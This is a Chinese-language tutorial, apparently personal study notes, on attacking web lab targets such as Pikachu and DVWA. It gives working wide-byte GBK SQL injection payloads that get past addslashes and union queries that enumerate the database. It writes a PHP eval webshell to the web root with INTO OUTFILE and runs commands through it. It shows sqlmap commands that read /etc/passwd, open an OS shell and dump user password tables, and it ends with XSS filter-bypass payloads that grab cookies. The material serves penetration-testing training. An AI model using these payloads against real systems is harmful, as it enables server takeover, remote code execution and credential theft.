1、如果一个字符的大小是一个字节的，称为窄字节；

2、如果一个字符的大小是两个及以上字节的，称为宽字节；

像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节，中文占两个字节。

宽字节注入利用MySQL的一个特性，使用GBK编码的时候，会认为两个字符是一个汉字。

1、addslashes() 函数会在预定义字符之前添加反斜线 \ 进行转义

2、预定义字符：单引号 ' ，双引号 " ，反斜线 \ ，NULL

免责声明

本文仅是个人对SQL注入及相关工具的学习测试过程记录，不具有恶意引导意向。

宽字节注入利用MySQL的一个特性，使用GBK编码的时候，会认为两个字符是一个汉字。

像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节，中文占两个字节

show create database pikachu;

Pikachu库的编码并不是宽字节字符集，但是pikachu靶场存在宽字节注入

靶场宽字节注入涉及的表

select id,username,email from pikachu.member;

$set = "set character_set_client=gbk"

宽字节注入利用MySQL的一个特性，使用GBK编码的时候，会认为两个字符是一个汉字。

像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节，中文占两个字节

%de%5c：mysql会解析为蓝色框内的字“轡”

%df%5c：mysql会解析为蓝色框内的字“運”

反斜杠“\”的URL编码是%5c

猜测payload：

kobe' or 1=1#

select id,username,email from pikachu.member where username='kobe' or 1=1#';

手动添加反斜杠“\”模拟addslashes()功能“自动转义特殊字符”

select id,username,email from pikachu.member where username='kobe\' or 1=1#';

使用GBK宽字节字符集

select id,username,email from pikachu.member where username='kobe%df\' or 1=1#';

说明：此次查询为空，没有逃逸引号，反斜杠转义生效

select id,username,email from pikachu.member where username='kobe%df%5c' or 1=1#';

说明：把反斜杠转为URL编码%5c(实际宽字节注入中，addslashes()函数自动添加反斜杠转义payload中的引号，网页也会把反斜杠转换成%5c，后续通过burp抓包展示)，%df%5c被解析为“運”，这样addslashes()函数自动添加的反斜杠被GBK宽字节字符集绕过，引号未被转义。

kobe%df' or 1=1#

前提说明：addslashes()函数会自动添加反斜杠
说明：查询结果为不存在，说明转义失败

Burb抓包发现%df的%被作为特殊字符串转换为了URL编码%25；payload中的引号被正常转为URL编码%27

Burp中手动修改报文把%25df%27纠正为%df%27

放行该数据包：intercept is off

靶场页面正常显示了宽字节注入后绕过反斜杠，成功输出了查询结果

Burp抓的包中修改为%df%5c，执行send发送，正常查询出结果

Payload：kobe%df' union all select database(),version()#

Payload：

kobe%df' union all select 1,group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=database()#

show tables;

Mysql支持向外写文件（这里的“外”是指服务器内部），需要用到 select into outfile 命令：

在Mysql数据库中存在 select into outfile 命令，该命令的作用是将被选择的一行代码写入一个文件中，文件被创建到服务器上。其中，select into outfile的使用前提是：

1. 要知道网站的绝对路径，可以通过开源程序、报错信息、phpinfo界面、404界面等一些方式知道；
2. 大部分网站都是使用/var/www/html作为网站根目录
3. 如果网站使用到了开源框架，直接看代码也能找到根目录
4. 通过其他漏洞获取到根目录信息

（2）对目录要有写权限，一般image之类的存放图片的目录有写权限；

（3）要有mysql file权限（即能否对系统的文件读取和写操作），默认情况下只有root权限有；

还要注意：写的文件名一定是在网站中不存在的，不然会失败。

select 1,"<?php eval($_POST['a']);?>";

说明： eval($_POST['a']);

$_POST[]：接收method=’POST’中表单的值。

eval()：是一种将字符串作为PHP代码执行的语言结构。‌ 这种函数功能强大，但也非常危险，因为它允许执行任意的PHP代码；因此，使用时确保传入的字符串数据是安全可控的，应避免执行任何未经验证的用户输入数据，以防止代码注入攻击。

<?php eval($_POST['a']);?>：一句话木马‌‌

select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.php';

说明：把select查询的记录写入指定的目标文件中

Payload：1' union select 1,2#

源码：SELECT first_name, last_name FROM users WHERE user_id = '$id';

SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2#';

前端：SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2#';

后端：select 1,"<?php eval($_POST['a']);?>" into outfile'/var/www/html/shell2.php';

组合前后端语句：

SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,"<?php eval($_POST['a']);?>" into outfile'/var/www/html/shell2.php'#';

根据上边的输出和SQL语句拼接形态，进一步精简输出和改善SQL语句

SELECT first_name, last_name FROM users WHERE user_id = '' union select 1,"<?php eval($_POST['a']);?>" into outfile'/var/www/html/shell2.php';

最终：组合后的poyload

' union select 1,"<?php eval($_POST['a']);?>" into outfile'/var/www/html/shell2.php

说明：payload左边的引号闭合源码中$id左边的引号，payload中路径只写了左侧引号正好和$id右边的引号形成闭合，这样就不用再使用#去注释或逃逸原有的引号

前台提交payload后，前台无回显

查看后端文件

Load URL：点击后，自动填充当前浏览器页面的URL

复选框：因payload是$_POST方法，此处选择Post data增加post参数(a=phpinfo();)

Execude：基于Load URL 和Post data在此发起请求

a=system(pwd);
说明：a的值必须是PHP支持的代码

连接密码是webshell（一句话木马）中参数名“a”；通过webshell直接获取了整个靶场网站的完整目录

-u：目标URL

说明1：只能是GET方法URL，且URL中包含参数，下边的操作说明一步步说明

说明2：配合--data(3.2.1章节)可以使-u的URL是POST方法，通过--data指定参数

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/"

说明：执行后会构造payload去测试注入

截图说明：提示没有发现注入点，why？明明此靶场URL存在注入点

--batch

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/" --batch

执行过程会有交互式问答，--batch参数交给sqlmap自己判断应答

说明：提示也是没有发现注入点，why？

原因：sqlmap也是一个客户端，虽然-u参数给的是登录后url但是作为一个新客户端也是需要登录的，跳转到了登录页面，而且没有cookie，下面给个cookie再试

获取一个cookie：在目标URL页面F12-->document.cookie获取一个cookie

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/" --batch --cookie "PHPSESSID=nuii4asp23qa7tqa6f7aiqrkc5; security=low"

说明：提示还是没有发现注入点，但是已经没有跳转到登录提示的问答了，为什么还是没有发现注入点?

注意：注入点是针对的网站的某个输入，就是某个变量或参数，以上URL中没有指定参数

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch --cookie "PHPSESSID=nuii4asp23qa7tqa6f7aiqrkc5; security=low"

支持sqlmap成功发现注入点

参数：-m

文件中保存url格式如下，sqlmap会一个一个检测（注：URL都代入了参数）

www.magedu1.com/vuln1.php?q=student

www.magedu2.com/vuln2.asp?id=1

www.magedu3.com/vuln3/id/1* （伪静态）

参数：-r

说明：-u参数URL只能是get方法且带参数，-r参数接收整个请求报文(请求行、请求头、报文体)，所以get|post方法都行，而且sqlmap命令行选项也可少写一些

sqlmap可以从一个文本文件中获取HTTP请求，这样就可以跳过设置一些其他参数（比如cookie，POST数据，等等）。

比如文本文件内如下：

POST/students.php HTTP/1.1

Host:www.magedu.com

User-Agent:Mozilla/4.0

id=1

示例：（配合burp获取请求报文）

python sqlmap.py -r 1.txt --batch

1.txt文件

GET /vulnerabilities/sqli/?id=12&Submit=Submit HTTP/1.1

Host: 10.0.0.104:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://10.0.0.104:8080/vulnerabilities/sqli/?id=1&Submit=Submit

Cookie: PHPSESSID=nuii4asp23qa7tqa6f7aiqrkc5; security=low

Upgrade-Insecure-Requests: 1

Priority: u=1

参数：--data

此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST参数。（解决3.1.1章节-u参数只能指定GET方法URL问题）

python sqlmap.py -u "http://www.magedu.com/students.php" --data="id=1" -f --

banner --dbs --users

参数：--scope

python sqlmap.py -l burp_http.log --scope="(www)?\.target\.(com|net|org)"

参数：--safe-url，--safe-freq

有的Web应用程序会在用户多次发送访问错误的请求时屏蔽掉之后的所有请求，这样sqlmap在进行探测或者注入的时候可能造成错误请求而触该策略，导致后续无法进行测试。

绕过这个策略有两种方式：

--safe-url：提供一个安全不错误的链接，每隔一段时间都会去访问一下。

--safe-freq：提供一个安全不错误的链接，每次测试请求之后都会再访问一遍安全链接。

-o 开启所有优化开关

说明：仅了解

参数：-p，--skip

sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试 HTTP Cookie 头的值，当大于等于3的时候也会测试 User-Agent 和 HTTP Referer 头的值。但是用户可以手动用-p参数指定想要测试的参数。

例如： -p "id,user-anget"

当使用--level的值很大但是有个别参数不想测试的时候可以使用--skip参数。

例如：--skip="user-agent,referer"

参数：--os

默认情况下sqlmap会自动的探测数据库服务器系统，支持的系统有：Linux、Windows

说明：在预知了目标的操作系统（比如linux），可以通过--os指定，那么sqlmap就会按照linux准备payload而不必考虑其他平台payload

参数：--invalid-bignum

当用户想指定一个报错的数值时，可以使用这个参数，例如id=13，sqlmap默认会取负值变成id=-13来报错，用户可以指定比如id=9999999来报错。

说明，在之前的章节使用union联合注入时有说明，为了避免页面回显长度受限而影响需要的内容显示，把union左侧的查询id值设为“-1”，如果网站做了-1排除，在手工注入或使用sqlmap时考虑使用大数字

--level=LEVEL 执行测试的等级（1-5，默认为1）

--risk：（*慎用此参数有风险）， 共有四个风险等级（0-3），默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。

参数：--level

共有五个等级，默认为1，最大为5，sqlmap使用的payload可以在xml/payloads.xml中看到，用户也可以根据相应的格式添加自己的payload。

这个参数不仅影响使用哪些payload，同时也会影响测试的注入点，GET和POST的数据都会测试（业务字段都会测试，不同等级的区别是探索的请求头字段不同），HTTPCookie在level为2的时候就会测试，HTTP User-Agent/Referer头在level为3的时候就会测试。

总之在不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值（说明：最好使用到3等级，避免安全设备检查到扫描或探测行为告警）。

参数：--risk（慎用）

共有三个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。（工作中不能用3等级）

在有些时候，例如在UPDATE/DELETE的语句中，注入一个OR的测试语句(or 1=1)，可能导致更新整个表，造成很大的风险。

测试的语句同样可以在xml/payloads.xml中找到，用户也可以自行添加payload。

python sqlmap.py -hh

Enumeration:

这些选项可用于枚举后端数据库管理系统信息、结构和表中的数据

-a, --all

-b, --banner

--current-user

--current-db

--hostname

--is-dba

--users

--passwords

--privileges

--roles

--dbs

--tables

--columns

--schema

--count

--dump

--dump-all

--search

--comments

--statements

-D DB

-T TBL

-C COL

-X EXCLUDE

-U USER

--exclude-sysdbs

--pivot-column=P..

--where=DUMPWHERE

--start=LIMITSTART

--stop=LIMITSTOP

--first=FIRSTCHAR

--last=LASTCHAR

--sql-query=SQLQ..

--sql-shell

--sql-file=SQLFILE

Retrieve everything

Retrieve DBMS banner

Retrieve DBMS current user

Retrieve DBMS current database

Retrieve DBMS server hostname

Detect if the DBMS current user is DBA

Enumerate DBMS users

Enumerate DBMS users password hashes

Enumerate DBMS users privileges

Enumerate DBMS users roles

Enumerate DBMS databases

Enumerate DBMS database tables

Enumerate DBMS database table columns

Enumerate DBMS schema

Retrieve number of entries for table(s)

Dump DBMS database table entries

Dump all DBMS databases tables entries

Search column(s), table(s) and/or databas

Check for DBMS comments during enumeratio

Retrieve SQL statements being run on DBMS

DBMS database to enumerate

DBMS database table(s) to enumerate

DBMS database table column(s) to enumerat

DBMS database identifier(s) to not enumer

DBMS user to enumerate

Exclude DBMS system databases when enumer

Pivot column name

Use WHERE condition while table dumping

First dump table entry to retrieve

Last dump table entry to retrieve

First query output word character to retr

Last query output word character to retri

SQL statement to be executed

Prompt for an interactive SQL shell

Execute SQL statements from given file(s)

--file-read=RFILE 从后端的数据库管理系统读取文件

--file-write=WFILE 上传文件到后端的数据库管理系统

--file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

参数：--file-read

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。

python sqlmap.py -r 1.txt --batch --file-read="/etc/passwd"

说明：读取的文件会放到截图中的目录

参数：--file-write,--file-dest

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。

python sqlmap.py -r 1.txt --batch --file-write="upload_magedu.txt" --file-dest="/var/www/html/upload_magedu.txt"

--os-cmd=OSCMD 执行操作系统命令

--os-shell 交互式的操作系统的shell

python sqlmap.py -r 1.txt --batch --os-cmd whoami

python sqlmap.py -r 1.txt --batch --os-cmd pwd

python sqlmap.py -r 1.txt --batch --os-shell

参数：--dump,-C,-T,-D,--start,--stop,--first,--last

如果当前管理员有权限读取数据库其中一个表的话，那么就能获取整个表的所有内容。

使用-D,-T参数指定想要获取哪个库的哪个表，不使用-D参数时，默认使用当前库。

可以获取指定库中的所有表的内容，只用--dump跟-D参数（不使用-T与-C参数），也可以用-dump跟-C获取指定的字段内容。

--dump的本质也是把爆破出的内容写入了本地缓存文件中

说明：渗透测试，获取有哪些漏洞类型即可，点到为止，不用继续爆数据，除非是攻防演练为了获得高分

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --stop 1

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --stop 2

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --stop 3

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --stop 4

说明：从截图中看出，--stop N选项是针对第一个列名排序后的前N行的输出

ython sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --start 2 --stop 4

说明：从截图中看出，--start M --stop N选项是针对第一个列名排序后的前M->N行的输出

python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump --start 2

说明：从截图中看出，--start M 选项是针对第一个列名排序后的M行到结尾行的输出

参数：--dump-all,--exclude-sysdbs

使用--dump-all参数获取所有数据库表的内容，可同时加上--exclude-sysdbs排除系统数据库，只获取用户数据库的表，即业务数据。

说明：渗透测试，获取有哪些漏洞类型即可，点到为止，不用继续爆数据，除非是攻防演练为了获得高分

python sqlmap.py -r 1.txt --batch --dump-all --exclude-sysdbs

参数：--search,-C,-T,-D

--search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。

可以在以下三种情况下使用：

-C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。

-T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名

-D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。

说明：渗透测试，获取有哪些漏洞类型即可，点到为止，不用继续爆数据，除非是攻防演练为了获得高分

如下dvwa库的两张表都有user字段

python sqlmap.py -r 1.txt --batch -D dvwa -C user --search

说明：指定了库名dvwa和字段名user，没有指定表名，会查询dvwa库中所有表(如果有user字段的话)中的user字段

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/?id=123&Submit=Submit#" --batch --cookie "PHPSESSID=obg708d6qq0nvpkf9sccbkb133; security=low" --dbs

说明1：探测出了该URL存在的注入类型

说明2：--dbs选项探测出了库名列表

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/?id=123&Submit=Submit#" --batch --cookie "PHPSESSID=obg708d6qq0nvpkf9sccbkb133; security=low" -D dvwa --tables

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/?id=123&Submit=Submit#" --batch --cookie "PHPSESSID=obg708d6qq0nvpkf9sccbkb133; security=low" -D dvwa -T users --columns

python sqlmap.py -u "http://10.0.0.104:8080/vulnerabilities/sqli/?id=123&Submit=Submit#" --batch --cookie "PHPSESSID=obg708d6qq0nvpkf9sccbkb133; security=low" -D dvwa -T users -C last_name,password --dump

反射型XSS、存储型XSS及DOM型XSS是跨站脚本攻击（XSS）的三种主要类型，它们在攻击方式、脚本存储位置、影响范围及触发条件等方面存在显著差异。以下是对这三种XSS攻击类型的详细比较：

①反射型XSS（Reflected XSS）

②存储型XSS（Stored XSS）

③DOM型XSS（DOM-based XSS）

攻击方式：

攻击者通过发送包含恶意脚本的URL给用户，并诱使用户点击该链接。

当用户点击链接时，服务器会将恶意脚本反射到响应中，并执行该脚本，从而达到攻击目的。

攻击方式：

攻击者通过注入恶意脚本到网站的数据库或文件系统中。

当其他用户浏览受影响的页面时，恶意脚本将从服务器端获取并执行，危害用户隐私和安全。

攻击方式：

恶意代码直接在客户端（浏览器）中通过JavaScript动态生成和插入到DOM中，导致恶意脚本执行。

脚本存储位置：

反射型XSS的恶意脚本并不会永久存储在服务器上，而是在服务器响应中动态生成的。

脚本存储位置：

恶意脚本或HTML代码被永久地注入到服务器的数据库或文件系统中。

脚本存储位置：

恶意代码不经过服务器，直接在客户端生成和执行。

影响范围：

通常只对点击恶意链接的用户造成影响，并且仅限于单个请求和响应过程。

影响范围：

可以影响到所有访问受影响页面的用户，因为恶意脚本已经永久存储在服务器上

影响范围：

取决于攻击者如何构造恶意URL和受害者如何与页面交互。

触发条件：

需要用户点击特定的恶意链接才能触发攻击。

触发条件：

用户无需进行任何特定的交互，只要访问受影响的页面即可触发攻击。

触发条件：

用户访问恶意URL时，客户端JavaScript代码会读取并处理这些输入，动态地修改DOM并执行恶意脚本。

防御措施：

对用户输入的数据进行严格的验证和过滤。

对输出到HTML上的数据进行适当的编码，如HTML实体编码、URL编码等。

使用安全的库和框架来处理用户输入。

防御措施：

对用户输入的数据进行严格的验证和过滤。

对输出到HTML上的数据进行适当的编码。

定期检查并清理数据库和文件系统中的恶意脚本。

使用安全的会话管理机制。

防御措施：

尽量避免直接使用用户输入的数据。

对用户输入的数据进行严格验证和过滤。

使用安全的DOM操作方法，如textContent或innerText，而不是innerHTML。

配置内容安全策略（CSP），限制浏览器执行未授权的脚本。

总结

①触发方式：反射型XSS需要用户点击特定的恶意链接；存储型XSS则无需用户交互，只要用户访问受影响的页面；DOM型XSS通过用户访问恶意URL并在客户端执行JavaScript代码。

②脚本存储位置：反射型XSS的恶意脚本在服务器响应中动态生成；存储型XSS的恶意脚本永久存储在服务器上；DOM型XSS的恶意代码不经过服务器。

③影响范围：反射型XSS通常影响单个用户；存储型XSS可能影响所有访问受影响页面的用户；DOM型XSS的影响范围取决于攻击者的构造和受害者的交互。

靶场：类似 留言板

Name和Messabe都可以测试用户输入，分别在不同安全等级测试如下JS，查看效果

说明：可通过F12查看器查看源码

<script>alert(1)</script>

<sCriPt>alert(1)</scRipt>

<sc<script>ript>alert(document.cookie)</script>

<img src=## one rror=alert(document.cookie)>